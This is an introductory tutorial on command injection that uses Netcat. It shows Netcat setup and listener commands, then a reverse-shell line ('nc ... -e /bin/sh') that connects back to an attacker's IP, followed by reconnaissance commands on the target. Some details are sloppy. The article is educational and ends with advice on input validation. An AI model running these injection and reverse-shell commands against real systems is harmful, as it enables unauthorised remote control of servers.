Introduction
In this article, we are going to look at a command Injection exercise that uses Netcat. Command Injection is a malicious attack on a web application that allows a user to perform a nslookup, whois, ping, traceroute, and more from a webpage. This vulnerability can be tested using special characters such as “;” semi-colon, or “|” pipe or “| |”, or “&” or “&&” to append the end of the user expected input e.g. (www.mycompany.com) followed by a command e.g. (cat/here/pwd). These commands may be used to get confidential data or any malicious behavior the attacker may deem necessary using the host’s Operating System commands. If the input is not properly validated or sanitized, unintended commands are allowed to be executed.
An attacker may do anything including viewing configuration files, modifying, or deleting data but this all depends on the level of privilege the application has. Command Injection takes advantage of the functionality of the application in which system commands are executed. Command Injection builds upon the default behavior of the application to execute unintended commands.
Since we are going to be using a Netcat exercise in this article, it is good practice that we understand what it is and its uses before we dive into our primary exercise.
What is Netcat?
Netcat is a network utility that is used to READ/WRITE data across TCP and UDP network connections.it is also known as the Swiss Army Knife of Networking because of its versatility. Its features include debugging, port listening, port scanner, port redirector and it has backdoor capabilities. Netcat can be used to produce a reverse shell on the web server, given that is installed, and connected back to our machine yielding complete control over the system.
The following are some of the available Netcat Commands:
- Port scanning
- Scripting
- Shell Scripting
- TCP Server and TCP Client Commands
- Prevent DNS Lookup
- Create a Chat or Web Server
- ITEM with Netcat commands
- HTTP Requests with Netcat commands
- Verbose Scan with Netcat commands
- Launching Reverse (Backdoor) Shells
You can transfer files directly through Netcat or use it as a backdoor into other networked systems. It functions as a back-end tool that allows for port scanning and port listening.
Now that we know what Netcat is and its capabilities, let's now show how it can be used to execute certain commands.
First of all, let us find out how to download Netcat on our Windows machine:
Run the following commands:
C:\Windows\system32>cd C:\Users\vicki\Desktop
C:\Users\vicki\Desktop>cd nc111nt
C:\Users\vicki\Desktop\nc111nt>nc
Cmd line: nc.exe –h
After the last command, you should get the following output to show you that you have successfully installed Netcat Tool on your Windows Machine.
[v1.11 NT www.rodneybeede.com/]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [options] [hostname] [port]
options
-ddetach from console, background mode
-g gatewaysource-routing hop point[s], up to 8
-G numsource-routing pointer: 4, 8, 12, ...
-hthis cruft
-i secsdelay interval for lines sent, ports scanned
-llisten mode, for inbound connects
-Llisten harder, re-listen on socket close
-nnumeric-only IP addresses, no DNS
-o filehex dump of traffic
-p portlocal port number
-rrandomize local and remote ports
-s addrlocal source address
-uUDP mode
-vverbose [use twice to be more verbose]
-w secstimeout for connects and final net reads
-zzero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
C:\Users\vicki\Desktop\nc111nt>C:\Users\vicki\Desktop>cd nc111nt
To start listening for ports you can try the following command:
C:\Users\vicki\Desktop\nc111nt>nc.exe -nlvp 4444
And this is what you should get in return:
listening on [any] 4444 ...
Besides listening to ports, you could also use some of Netcat’s parameters such as the:
-n
Which simply specifies that do not do DNS or service lookups on any specified address or port number. We also have:
-p
Which specifies what port number Netcat is going to be connecting from. Then we also have:
-v
Which specifies that Netcat gives me a more verbose output.
-l
For listening.
So basically what you need is another site where you can listen and execute commands on such that you can get data from that client. So Netcat uses a client-server relationship where one can listen and get data from if the application allows.
Netcat get a Shell
By using this command line in Netcat:
nc –l –p 1234
This opens up a listener for incoming connections –l opens a listener and the –p assigns a port number.
nc 192.168.3.245 1234 –e /bin/sh
This will connect to IP address 192.168.3.245 on port 1234, -e /bin/sh executes a shell that will be directed back to our system. This allows us to run commands from our own terminal.
root@kali: nc –l –p 1234
whoami
This command line will give us the current user name.
uname –a
Will give us the System information.
-ps
Will show us all the currently running processes on the target.
All the commands we have shown are not of any harm to the target, but attackers may move on to do other malicious commands to gain access and destroy the target’s repute. It is therefore very important and necessary for all web applications to have proper input validation in place such that Command Injection is not practiced and such versatile tools like Netcat are not used to destroy web applications but rather to solidify networking.
Conclusion
Command Injection can be very harmful to its targets especially if such versatile tools like Netcat are used wrongly. It is good that there are ways to mitigate Command Injection attacks and developers should adhere to validating user input or use online injection tools to mitigate web attacks.